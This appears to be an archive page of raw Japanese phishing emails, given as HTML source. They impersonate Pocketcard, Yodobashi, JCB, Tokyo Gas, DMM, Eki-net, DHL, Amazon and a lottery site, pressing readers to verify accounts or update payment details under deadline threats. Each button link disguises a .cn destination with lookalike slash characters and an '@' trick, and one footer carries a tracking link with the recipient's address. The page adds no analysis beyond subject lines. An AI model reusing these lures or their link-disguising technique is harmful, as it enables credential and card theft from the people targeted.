href="https://haxmbj.com∕RdeWodCZ∕xkPQOyB∕OpivWIXiqD@wakilxe.cn/qktxbpanm.co.jp"
target=_blank>今すぐ認証する</A> </DIV></DIV>
<DIV
class=note-block>※このメールはご本人によるご利用を前提に自動送信されています。<BR>万が一お心当たりがない場合は、ログイン後「お客様情報の確認・変更」よりご対応ください。<BR><BR>本メールは配信専用アドレスから送信されています。返信には対応しておりません。<BR><BR>ご不明点は
Pocketcard カスタマーセンターまでお問い合わせください。<BR><BR>© 2025 Pocketcard Inc. All Rights
Reserved. </DIV></DIV></BODY></HTML>

__ヨドバシサイト「お客様情報」サービス利用の推奨ブラウザ仕様

<HTML lang=ja><HEAD><TITLE>【ヨドバシカメラ】アカウント安全確認</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f5f7f9; font-family:"Meiryo",sans-serif; color:#222; }
.main-box { max-width:680px; margin:auto; background:#ffffff; border-radius:10px; overflow:hidden; }
.topline { background:#263e7c; padding:20px; text-align:center; color:#fff; font-size:17px; font-weight:bold; }
.alert-zone { padding:26px 24px; font-size:14px; line-height:1.7; }
.warn-box { background:#fff3f3; padding:16px; border-left:6px solid #b90000; margin:20px 0; font-size:13px; }
.account-detail { background:#f0f3f7; padding:16px; border:1px solid #ccc; border-radius:4px; font-size:13px; margin:20px 0; }
.account-detail div { margin-bottom:6px; }
.action-box { text-align:center; margin:28px 0; }
.btn-table { margin:auto; background:#263e7c; border-radius:6px; }
.btn-table td { padding:14px 36px; }
.btn-table a { color:#fff; text-decoration:none; font-weight:bold; font-size:14px; display:inline-block; }
.help-line { font-size:12px; color:#444; line-height:1.6; padding-top:20px; border-top:1px solid #ddd; }
.footer-zone { background:#ececec; font-size:11px; text-align:center; color:#555; padding:18px 12px; border-top:1px solid #ccc; }
@media screen and (max-width: 600px) {
.alert-zone { padding:18px 14px; font-size:13px; }
.btn-table td { padding:16px 0; }
}
</STYLE>

</HEAD>
<BODY>
<DIV class=main-box>
<DIV class=topline>【ヨドバシカメラ】アカウント安全確認</DIV>
<DIV class=alert-zone>
<P>いつもヨドバシドットコムをご利用いただきありがとうございます。</P>
<P style="max-width:none;">2025-12-16 時点で、アカウントに不審なログイン試行が検出されました。</P>
<DIV
class=warn-box>セキュリティ保護のため、以下よりログイン状況の確認をお願いいたします。<BR>放置されますと、一部機能の利用制限が行われる可能性がございます。
</DIV>
<DIV class=account-detail>
<DIV style="border-bottom-width:0px;"><STRONG>対象アカウント:</STRONG> club-ch4@huat.jp</DIV>
<DIV><STRONG>検出日時:</STRONG> 2025-12-16 07:06:40</DIV>
<DIV style="text-align-last:auto;"><STRONG>検出内容:</STRONG> 海外IPアドレスからのアクセス</DIV>
<DIV><STRONG>現在の状態:</STRONG> 対応待ち</DIV></DIV>
<DIV class=action-box>
<TABLE class=btn-table cellSpacing=0 cellPadding=0>
<TBODY>
<TR>
<TD><A
href="https://zagxsrnmk.com∕fxobfarj∕wtbbn∕lrghj∕xifynmosq@iuwefeg.cn">アカウントを確認する
</A></TD></TR></TBODY></TABLE></DIV>
<P style="line-height:normal;">72時間以内にご確認いただけない場合、安全のため一時的な利用停止が行われることがあります。</P>
<DIV class=help-line><STRONG>お問い合わせ:</STRONG><BR>ヨドバシカメラ カスタマーサービスセンター<BR>メール:<A
href="mailto:info@yXT2XOodobashi.com">info@yodobashi.com</A><BR>電話:03-7587-6209(10:00〜20:00
年中無休) </DIV></DIV>
<DIV class=footer-zone>このメールは送信専用です。返信は受け付けておりません。<BR>不審に思われた場合は破棄してください。<BR>©
2025 ヨドバシカメラ株式会社 </DIV></DIV></BODY></HTML>

__ご利用エリアの確認手続きをお願いいたします

<!-- UltraClean JCB v3 | DOM Fully Rebuilt --><HTML lang=ja><HEAD><TITLE>JCB 登録情報確認</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "メイリオ", "Hiragino Kaku Gothic ProN", sans-serif;
background: #f1f3f6;
color: #1a1a1a;
font-size: 15px;
line-height: 1.8;
}
..shell {
max-width: 700px;
margin: 0 auto;
background: #fff;
border-radius: 12px;
border: 1px solid #ccc;
box-shadow: 0 2px 6px rgba(0,0,0,0.05);
overflow: hidden;
}
.topbar {
background: #003366;
color: #fff;
padding: 22px 28px;
font-size: 18px;
font-weight: bold;
}
.content {
padding: 28px 32px;
}
.content p {
margin: 0 0 16px;
}
.section-title {
font-size: 16px;
font-weight: bold;
color: #003366;
margin: 22px 0 10px;
border-bottom: 1px solid #cfd8e0;
padding-bottom: 4px;
}
.info-box {
background: #f5faff;
border: 1px solid #c7e2f5;
padding: 16px 20px;
border-radius: 6px;
margin: 20px 0;
}
.info-box ul {
margin: 0;
padding-left: 20px;
}
.info-box li {
margin-bottom: 6px;
}
.cta-block {
text-align: center;
margin: 34px 0;
}
.cta-block span {
background: #003366;
color: #fff;
padding: 12px 28px;
border-radius: 30px;
font-weight: bold;
font-size: 15px;
display: inline-block;
}
.cta-block span a {
color: inherit;
text-decoration: none;
display: inline-block;
}
.cta-block span:hover {
background: #002a55;
}
.footer-note {
font-size: 13px;
color: #555;
padding: 0 32px 20px;
}
.footer {
background: #f6f6f6;
text-align: center;
font-size: 12px;
color: #777;
padding: 20px;
border-top: 1px solid #ccc;
}
.footer a {
color: #0b4c88;
text-decoration: none;
}
@media screen and (max-width: 600px) {
.content {
padding: 20px 16px;
}
.cta-block span {
display: block;
width: 100%;
box-sizing: border-box;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=shell>
<DIV class=topbar>JCBカード 登録情報確認のお願い</DIV>
<DIV class=content>
<P>平素よりJCBカードをご利用いただき、誠にありがとうございます。</P>
<P style="border-top-right-radius:;">セキュリティ保護の観点から、登録情報の再確認をお願いしております。</P>
<DIV class=section-title>確認が必要な項目</DIV>
<DIV class=info-box>
<UL>
<LI>登録電話番号
<LI>住所情報 </LI></UL>
<P style="all:none;">(現在の登録内容と相違がないかをご確認ください)</P></DIV>
<DIV class=section-title>ご確認・更新の手順</DIV>
<P>以下の公式サイトリンクよりご確認をお願いいたします。</P>
<DIV class=cta-block><SPAN><A
href="https://nofdbsj.com∕gsRMuliy∕oyInAJ∕MPCNwcla@oxyonuf.cn/ofdns.co.jp">JCB公式サイトはこちら</A></SPAN>
</DIV>
<P>ログイン後、「登録情報確認」画面より内容変更が可能です。</P>
<DIV class=section-title>ご注意事項</DIV>
<DIV class=info-box>
<UL>
<LI>JCBからお電話やメールで直接情報変更を依頼することはございません。
<LI>必ず上記公式リンクよりアクセスをお願いします。
<LI>個人情報の入力は信頼できる公式サイト上でのみ行ってください。 </LI></UL></DIV>
<DIV class=section-title>カスタマーサポート</DIV>
<P>ご不明な点がございましたら、JCBカスタマーサポートまでご連絡ください。</P></DIV>
<DIV class=footer-note>このメールは送信専用です。返信は受け付けておりません。</DIV>
<DIV class=footer><A href="#">JCBカスタマーセンター</A>までお問い合わせください。<BR>© 2025 JCB Co.,
Ltd. All rights reserved. </DIV></DIV></BODY></HTML>

__公式サイトご利用者様限定:ジャンボ宝くじ22枚を無料配布中

<!-- NOTE: Loto-style v1 新構造テンプレート --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=format-detection content=telephone=no>
<META name=color-scheme content="light only">
<STYLE>
body {
margin: 0;
padding: 0;
background: #f4f4f4;
font-family: "Meiryo", sans-serif;
color: #222;
}
.wrap {
max-width: 680px;
margin: auto;
background: #fff;
border-radius: 8px;
overflow: hidden;
box-shadow: 0 0 6px rgba(0,0,0,0.08);
}
.head {
background: #9e0038;
color: #fff;
text-align: center;
padding: 20px;
font-size: 18px;
font-weight: bold;
}
.content {
padding: 24px;
}
.content h1 {
font-size: 17px;
color: #9e0038;
margin: 0 0 14px;
}
.content p {
font-size: 15px;
margin: 10px 0;
line-height: 1.7;
}
.box {
background: #fff8f8;
border-left: 4px solid #9e0038;
padding: 16px;
margin: 18px 0;
}
.cta {
display: flex;
justify-content: center;
padding: 30px 0;
}
.cta a {
display: block;
text-align: center;
border: 2px solid #9e0038;
color: #9e0038;
font-weight: bold;
text-decoration: none;
padding: 14px 24px;
border-radius: 28px;
font-size: 16px;
width: 90%;
max-width: 320px;
transition: 0.3s;
}
.cta a:hover {
background: #9e0038;
color: #fff;
}
.foot {
background: #efefef;
font-size: 12px;
text-align: center;
color: #666;
padding: 16px;
border-top: 1px solid #ccc;
}
@media (max-width: 600px) {
.content {
padding: 18px;
}
.cta a {
font-size: 17px;
padding: 16px;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=wrap>
<DIV class=head>【宝くじ公式サイト】特別キャンペーンのお知らせ</DIV>
<DIV class=content>
<H1>日頃のご愛顧に感謝を込めて</H1>
<P style="direction:ltr;">いつも宝くじ公式サイトをご利用いただき、誠にありがとうございます。</P>
<P>ただいま<EM>特別キャンペーン</EM>を期間限定で開催中です。</P>
<DIV class=box>
<P style="position:static;"><STRONG>■ プレゼント内容:</STRONG><BR>ハロウィンジャンボ宝くじ
22枚(連番11枚+バラ11枚)<BR><STRONG>価格:</STRONG>6,600円相当</P>
<P style="right:auto;"><STRONG>■ 対象者:</STRONG> 宝くじ公式サイト会員</P>
<P><STRONG>■ 応募期限:</STRONG> このメール受信から <STRONG>3日以内</STRONG></P></DIV>
<P style="border:medium none black;">キャンペーンの詳細は以下よりご確認ください。</P></DIV>
<DIV class=cta><A
href="https://blunkopnvl.com∕nBqMFidKg∕RRwRJNxH∕POdvsXIgG∕FfpmVblHiD∕pOceLJNf@PWvWsYkfYP.ztbashm.cn">キャンペーンに申し込む</A>
</DIV>
<DIV class=foot>本メールは送信専用です。お問い合わせは公式サイトよりお願いいたします。<BR>© 2025 宝くじ公式サイト All
rights reserved. </DIV></DIV></BODY></HTML>

__月次ご利用料金確定のお知らせ

<!-- UltraClean TokyoGas v1 | 料金通知構造完全再構成 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Meiryo", "Yu Gothic", sans-serif;
background: #eef3f8;
color: #222;
font-size: 15px;
line-height: 1.8;
}
.mail-shell {
max-width: 720px;
margin: 30px auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 2px 10px rgba(0,0,0,0.05);
overflow: hidden;
}
.mail-header {
background: #003e7e;
color: #fff;
font-size: 17px;
font-weight: bold;
padding: 22px 26px;
}
.mail-body {
padding: 28px 30px;
}
.mail-body p {
margin: 14px 0;
}
.alert-box {
background: #fff9e5;
border-left: 5px solid #f9a825;
padding: 14px 20px;
font-weight: bold;
color: #7a4e00;
border-radius: 5px;
margin: 24px 0;
}
.cta-block {
text-align: center;
margin: 36px 0;
}
.cta-block a {
background: #0064b1;
color: #fff;
padding: 14px 36px;
border-radius: 40px;
text-decoration: none;
font-weight: bold;
font-size: 15px;
display: inline-block;
transition: all 0.3s ease;
}
.cta-block a:hover {
background: #0084d1;
}
.faq-section {
margin-top: 28px;
background: #f4f6fa;
border-top: 1px solid #ddd;
padding: 20px 22px;
}
.faq-section h4 {
font-size: 16px;
margin: 0 0 12px;
color: #003f7d;
}
.faq-section .q {
font-weight: bold;
color: #003f7d;
margin-top: 12px;
}
.faq-section .a {
margin-bottom: 10px;
}
.mail-footer {
background: #f1f1f1;
font-size: 12px;
color: #555;
padding: 20px;
text-align: center;
border-top: 1px solid #ccc;
}
.mail-footer a {
color: #0056a3;
text-decoration: underline;
}
@media screen and (max-width: 640px) {
.mail-body {
padding: 20px 16px;
font-size: 14px;
}
.cta-block a {
width: 100%;
padding: 14px 0;
box-sizing: border-box;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=mail-shell>
<DIV class=mail-header>【東京ガス】お支払いに関する重要なお知らせ</DIV>
<DIV class=mail-body>
<P>平素より東京ガスをご利用いただき、誠にありがとうございます。</P>
<P style="outline-style:none;">現在、今月のご請求金額が確定しておりますが、お客様の支払い処理が正常に完了しておりません。</P>
<DIV class=alert-box>このままではサービスが停止される可能性があるため、早急にお手続きをお願いいたします。</DIV>
<P style="border-style:none;">下記リンクより、支払い情報をご確認のうえ更新をお願いいたします。</P>
<DIV class=cta-block><A
href="https://prrxraj.com∕kyludq∕xojic∕uoqjfuqef@ufoepjx.cn"
target=_blank>支払い情報を更新</A> </DIV>
<P style="border-top-color:transparent;">更新完了後、引き続きサービスをご利用いただけます。</P>
<DIV class=faq-section>
<H4>よくあるご質問(FAQ)</H4>
<DIV class=q>Q: 更新手続きには時間がかかりますか?</DIV>
<DIV class=a>A: 通常は数分で完了します。</DIV>
<DIV class=q>Q: 安全性は確保されていますか?</DIV>
<DIV class=a>A: はい、SSL暗号化通信により保護されています。</DIV></DIV></DIV>
<DIV class=mail-footer>※このメールは送信専用です。返信いただいても対応できません。<BR><A
href="https://vhehzyqr.com/track/open?email=club-ch4@huat.jp&amp;timestamp=1765834845">配信停止はこちら</A><BR><BR>©
東京ガス株式会社 </DIV></DIV></BODY></HTML>

__DMMオンラインサロン参加で豪華10,000ポイントを進呈!

<!-- UltraClean DMM Points v1 | 公式キャンペーン構造完全再構成 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
background: #f5f5f5;
font-family: "Meiryo", "Hiragino Kaku Gothic ProN", sans-serif;
font-size: 15px;
color: #2a2a2a;
line-height: 1.7;
}
.wrap {
max-width: 700px;
margin: 30px auto;
background: #fff;
border-radius: 12px;
box-shadow: 0 2px 8px rgba(0,0,0,0.05);
overflow: hidden;
}
.banner {
background: #fff;
padding: 22px;
border-bottom: 2px solid #a00024;
text-align: center;
color: #a00024;
font-size: 18px;
font-weight: bold;
}
.section {
padding: 28px 30px;
}
.section p {
margin: 16px 0;
}
.notice {
background: #fff0f0;
border-left: 4px solid #b50024;
padding: 16px 18px;
font-size: 14px;
border-radius: 6px;
margin: 20px 0;
}
.cta-box {
text-align: center;
margin: 30px 0;
}
.cta-box a {
display: inline-block;
padding: 14px 34px;
background: #b50024;
color: #fff;
border-radius: 40px;
text-decoration: none;
font-weight: bold;
font-size: 15px;
box-shadow: 0 3px 6px rgba(0,0,0,0.1);
transition: all 0.3s ease;
}
.cta-box a:hover {
background: #c8002f;
}
.footer-text {
font-size: 13px;
color: #444;
margin-top: 24px;
}
.bottom {
background: #f3f3f3;
font-size: 12px;
color: #777;
text-align: center;
padding: 20px 18px;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 640px) {
.section {
padding: 20px 16px;
font-size: 14px;
}
.cta-box a {
width: 100%;
padding: 14px 0;
box-sizing: border-box;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=wrap>
<DIV class=banner>【DMMオンラインサロン】10,000ポイントプレゼントキャンペーン</DIV>
<DIV class=section>
<P>いつもDMMオンラインサロンをご利用いただき、誠にありがとうございます。</P>
<P>感謝の気持ちを込めて、<STRONG>10,000ポイントプレゼントキャンペーン</STRONG>を開催中です。</P>
<DIV class=notice>対象ページからのお申込みだけで、<BR><STRONG>10,000円相当のDMMポイント</STRONG>をプレゼント!
</DIV>
<P>キャンペーンの詳細および申込方法については、下記よりご確認ください。</P>
<DIV class=cta-box><A
href="https://rahtrv.com∕mwoOJSfE∕ayKutI∕vWddG∕tcLmg∕fvwwM@vSxXil.mounfk.cn"
target=_blank>

【重要】ご登録カード情報の確認について【えきねっと】

平素より「えきねっと」をご利用いただき誠にありがとうございます。

弊社システムにより、お客様のご登録決済情報が正常に利用できない状態であることが確認されました。
主な要因は以下の通りです:
- ご利用のクレジットカードが停止されている
- 有効期限が更新されていない

このままでは、きっぷ予約など一部サービスがご利用いただけなくなる可能性があります。
サービス停止を防ぐため、必ず決済情報の更新をお願いいたします。

▼お支払い情報の確認・更新はこちら
https://www.eki-net.com/Personal/member/wb/ciydbym2l/Login
手順:
1. 上記リンクより「えきねっと」にログインしてください。
2. 「会員メニュー」から「お支払い情報の確認・更新」を選択。
3. 新しいカード情報を入力のうえ、「保存」を押してください。

※2025年12月31日までに更新が完了しない場合、サービスが制限される可能性があります。

本件に関してご不明点がある場合は、下記サポートセンターまでお問い合わせください。

――――――――――――――――――――
◆えきねっとサポートセンター
TEL:050-2016-5000
受付時間:8:00〜22:00
サイト運営・管理:JR東日本ネットステーション
――――――――――――――――――――

__【確認が必要です】ポケットカードのご利用状況について

<!-- UltraClean Pocketcard v1 | 完全異構DOM + ボタン再構築 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Meiryo", sans-serif;
background: #eef1f4;
color: #222;
font-size: 15px;
line-height: 1.8;
}
.outer {
max-width: 700px;
margin: 20px auto;
background: #fff;
border: 1px solid #ccc;
border-radius: 10px;
box-shadow: 0 0 6px rgba(0,0,0,0.04);
overflow: hidden;
}
.topbar {
background: #004b91;
color: #fff;
padding: 20px;
font-size: 18px;
font-weight: bold;
text-align: center;
}
.info {
background: #f7f9fc;
padding: 12px 24px;
font-size: 13px;
color: #444;
}
.content {
padding: 28px 30px;
}
.content p {
margin: 14px 0;
}
.alert-box {
background: #e6f3ff;
border-left: 5px solid #0077c2;
padding: 16px;
border-radius: 4px;
margin: 24px 0;
font-size: 14px;
}
.cta-box {
text-align: center;
margin: 36px 0;
}
.cta-button {
background: #005bac;
color: #fff;
padding: 14px 32px;
font-weight: bold;
font-size: 15px;
border-radius: 999px;
text-decoration: none;
display: inline-block;
transition: background 0.3s ease;
}
.cta-button:hover {
background: #0072cc;
}
.note-block {
background: #f5f5f5;
font-size: 13px;
padding: 20px 24px;
text-align: center;
color: #666;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.content {
padding: 20px;
}
.cta-button {
width: 92%;
box-sizing: border-box;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=outer>
<DIV class=topbar>Pocketcard セキュリティセンターからのお知らせ</DIV>
<DIV class=info>通知番号:PC-2025-12-16 / お客様番号:****7110</DIV>
<DIV class=content>
<P><STRONG>アカウントの再認証をお願いいたします。</STRONG></P>
<P>いつも Pocketcard をご利用いただきありがとうございます。</P>
<P>システムによるセキュリティチェックの結果、現在お客様アカウントにて再認証が必要と判定されました。</P>
<DIV class=alert-box><STRONG>▼
再認証の手順</STRONG><BR>・下記のボタンよりログインページにアクセスしてください。<BR>・案内に従って、必要な情報をご入力ください。<BR><BR><STRONG>※</STRONG>
本通知から48時間以内に手続きが行われない場合、一部機能が制限される可能性があります。 </DIV>
<DIV class=cta-box><A class=cta-button
href="https://rzdjnhukz.com∕KthgDzY∕HrnJgOPa∕xLZciWX@wakilxe.cn/sxchhmddw.co.jp"
target=_blank>今すぐ認証する</A> </DIV></DIV>
<DIV
class=note-block>※このメールはご本人によるご利用を前提に自動送信されています。<BR>万が一お心当たりがない場合は、ログイン後「お客様情報の確認・変更」よりご対応ください。<BR><BR>本メールは配信専用アドレスから送信されています。返信には対応しておりません。<BR><BR>ご不明点は
Pocketcard カスタマーセンターまでお問い合わせください。<BR><BR>© 2025 Pocketcard Inc. All Rights
Reserved. </DIV></DIV></BODY></HTML>

__DHL発送進行中:ご確認と対応をお願いします

<HTML lang=ja><HEAD><TITLE>ィネキネブザサせ</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f6f7f8; font-family:"Meiryo",sans-serif; color:#202020; }
.wrap-block { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.04); }
.banner-line { background:#d40511; color:#fff; text-align:center; font-weight:bold; font-size:16px; padding:18px; }
.content-box { padding:24px 26px; font-size:14px; line-height:1.75; }
.highlight-area { background:#fff4f4; border:1px solid #f3c3c3; padding:14px; font-weight:bold; color:#9e0000; border-left:6px solid #e60012; margin:20px 0; }
.button-area { text-align:center; margin:28px 0; }
.button-holder { display:inline-table; background:#d40511; border-radius:4px; border:1px solid #b0000f; }
.button-holder a { display:block; padding:14px 40px; color:#fff; font-size:15px; font-weight:bold; text-decoration:none; }
.button-holder a:hover { background:#a3000d; }
.footer-segment { font-size:12px; padding:20px 26px; border-top:1px solid #f0e082; background:#fcfcf4; color:#666; text-align:center; }
@media screen and (max-width:600px) {
.content-box { padding:18px 14px; font-size:13px; }
.button-holder a { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>

</HEAD>
<BODY><SECTION class=wrap-block>
<DIV class=banner-line>配送に関する重要なお知らせ</DIV>
<DIV class=content-box>
<P style="overflow-x:visible;"><STRONG>お客様各位</STRONG></P>
<DIV class=highlight-area>パッケージ番号:****-*****-9944 は現在、配達待機中です。 </DIV>
<P style="opacity:1;">配送状況をご確認いただき、必要な手続きを早急にお願い申し上げます。</P>
<P>以下のリンクより、現在の配送状況をご確認いただけます。</P></DIV>
<DIV class=button-area>
<DIV class=button-holder><A
href="https://poyfm.com∕JOAnxo∕zHpKw∕mbtgKOky@nhsiqna.cn/DrPTW/orders/KjODe/user/l_z9QE_mCvt/nQKPG9/rewards/dIR5E0WnP1VRn9/Ib1RuY/help/FCej5J/user/b_PvcxjtGrxft/zVAnv/app/gSd-SZVzsfH?user_agent=KuVSs5gOTI&ref=kSMcPHJT&session=PQqTM3Np7d&page=IFb-">荷物を追跡する</A>
</DIV></DIV>
<DIV class=content-box>
<P style="isolation:auto;">ご不明な点がございましたら、カスタマーサポートまでお問い合わせください。</P>
<P style="MARGIN-TOP: 24px">配送センター事務局<BR>〒100-0001 東京都千代田区霞が関1-1-1</P></DIV>
<DIV
class=footer-segment>本メールは自動配信専用です。返信いただいても対応できません。<BR>記載内容に誤りがある場合でも補償はできかねますのでご了承ください。
</DIV></SECTION></BODY></HTML>

__【Amazon】プライムメンバー資格が一時無効になりました

<HTML lang=ja><HEAD><TITLE>Amazonプライム支払い確認</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f3f4f7; font-family:"Meiryo",sans-serif; color:#2a2a2a; font-size:15px; line-height:1.8; }
.outer-shell { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.05); border:1px solid #ddd; }
.headbar { background:#232f3e; color:#fff; text-align:center; padding:22px; font-size:16px; font-weight:bold; }
.maincontent { padding:28px 30px; }
.maincontent p { margin-bottom:16px; }
.warnblock { background:#fff0e1; border-left:6px solid #d9822b; padding:14px 20px; font-size:14px; font-weight:bold; border-radius:4px; margin:24px 0; color:#8b4513; }
.cta { text-align:center; margin:30px 0; }
.cta a { display:inline-block; background:#ff8c00; color:#fff; padding:14px 36px; font-size:15px; font-weight:bold; text-decoration:none; border-radius:5px; transition:all .3s ease; }
.cta a:hover { background:#d26900; }
.infolist { padding:0 0 0 20px; margin:0 0 24px; font-size:14px; color:#333; }
.infolist li { margin-bottom:8px; }
.footerinfo { background:#f5f6f7; padding:20px 26px; font-size:13px; color:#666; border-top:1px solid #ccc; text-align:center; }
.footerinfo a { color:#007bff; text-decoration:none; }
@media screen and (max-width: 600px) {
.maincontent { padding:18px 16px; }
.cta a { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>

</HEAD>
<BODY>
<DIV class=outer-shell>
<DIV class=headbar>Amazonプライム会員資格の更新について</DIV>
<DIV class=maincontent>
<P>いつもAmazonプライムをご利用いただき、誠にありがとうございます。</P>
<P style="word-spacing:normal;">現在、ご登録の支払い方法により月額料金の請求が正常に処理できておりません。</P>
<P><STRONG>お支払い情報を確認の上、3日以内に再設定をお願いいたします。</STRONG></P>
<DIV class=warnblock>ご対応がない場合、プライム特典の一時停止やアカウント機能の制限が行われる可能性があります。 </DIV>
<P style="mix-blend-mode:normal;"><STRONG>請求保留の主な理由:</STRONG></P>
<UL class=infolist>
<LI>クレジットカードの有効期限切れ
<LI>口座残高不足または引き落とし不能
<LI>カード会社による承認拒否
<LI>登録情報の更新漏れ </LI></UL>
<P style="overflow-x:visible;">プライム特典を継続してご利用いただくために、早めのご対応をお願いいたします。</P></DIV>
<DIV class=cta><A
href="https://nfgsbcm.com∕hruqqusq∕youhdqggs∕uzoyz∕huhhhdx∕dxhccvuy@lwmzuss.cn">お支払い方法を確認する</A>
</DIV>
<DIV class=footerinfo>このメールは送信専用です。返信はできません。<BR>詳細は <A href="#">カスタマーサービス</A>
までお問い合わせください。<BR><BR>© 2025 Amazon Japan G.K. All rights reserved.
</DIV></DIV></BODY></HTML>

r


Total Access : 124,348 (Today : 270 / Yesterday : 397)

読者メール登録:

http://huat.jp/club-ch4/